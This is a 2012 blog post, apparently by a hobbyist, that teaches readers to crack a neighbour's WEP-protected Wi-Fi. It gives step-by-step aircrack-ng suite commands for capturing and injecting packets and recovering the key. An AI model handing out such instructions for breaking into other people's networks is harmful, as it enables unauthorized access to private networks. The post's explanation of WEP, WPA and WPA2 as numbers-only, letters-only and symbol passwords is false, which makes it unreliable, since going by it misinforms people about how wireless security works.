Tuesday, July 10, 2012

SOME PEOPLE SAYS "THE BEST NEIGHBOR IS THAT WHO DOESN'T PUT PASSWORD ON HIS WIFI" BUT I SAY "NO PROBLEM, LET THEM PUT....I'LL HACK IT..!!!!"

Hello again! so you may got an !dea by the heading of the topic ;)...!!! well today I'll write a topic on how to hack WiFi.....where as everyone can observe that whenever signing up for any social network or email acc. if you enter a password of 2 to 4 words...they'll say "PLZ CHOOSE A STRONG PASSWORD" so what basically they mean is that if you choose a password with only 2 or 3 letters, then any one can simply CRACK you Accounts Password....but if you keep a long password with about 6 to 10 letter so it will take alot of time of the CRACKER to CRACK it..!!! and when signing up for SKYPE....they ask you to keep a password containing letters and number both.....because if a CRACKING system concentrate on letter or digit only them the system will work fast and give an accurate result and it will be a matter of few min.
but if the computer is asked to check both NUMBERS & DIGITS...so it will take much time of the CRACKER..!!!
So There Are 3 types of WiFi passwords
1- WEP {containing number only(easy to crack)matter of 3 mins}
2- WPA {containing letters only(not easy to crack because ENGLISH LANGUAGE consists 26 letter
where as some of them can be capital also...so all alphabets make 52 letters...and to check all possible combinations between them is a very long time taking task..)}
3-WPA2 {containing numbers, letters, and symbols(impossible to crack by brute force attack...because it would take centuries to crack it)}

STEPS NEEDED TO HACK WEP (the easiest one)
1. first of all you need to download backtrack iso. image and burn it to DvD which you can download HERE!
2. After burning it to a DvD using NERO or any other burning software..! just reboot it!
and after it loads just type "startx"
and it will open and just open console from the down bar..!!
3. Open Console and type 
Commonly Used Terms :- 
  • WEP - Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • Access Point (AP)- A wireless router
  • MAC Address - Media Access Control address, a unique id assigned to wireless adapters and routers .It comes in hexadecimal format (ie 00:15:eR:21:a3:63)
  • BSSID - Access Point’s MAC address
ESSID - Access Point’s Broadcast name

COMMAND NEEDED FOR ATTACKING WEP!
1. airmon-ng start wlan0
2. airodump-ng wlan0

now choose your network and copy bssid and remember the channel no.
3. 
airodump-ng mon0 --bssid -c (channel ) -w crack (remember all new commands will be typed in a new console box)

4. now airodump-ng has started capturing DATA.....( now there are two ways ....no.1 wait until the data goes on to 25000 but this will take a long time 2nd. Type Some Commands And Boost The capturing of DATA

to boost type the following commands
4. 
aireplay-ng - 1  3  -a (bssid fo the target ) mon0

After the airodump-ng has captured atleast 30,000 DATA packets 

type the command in new console
5. aircrack-ng crack-01.cap
And It Will Show The Key Or it might say that "Next Try At 40000 IVs" in this case when data packets reaches 40,000 then try the same command again ...

HOPE YOU ENJOYED MY TOPIC AND UNDERSTAND AS WELL...IF ANY DOUBTS PLEASE DON'T HESITATE TO COMMENT 

AND YOU CAN JOIN MY FACEBOOK PAGE "http://facebook.com/hackerboy4" (without quotations marks)


No comments:

Post a Comment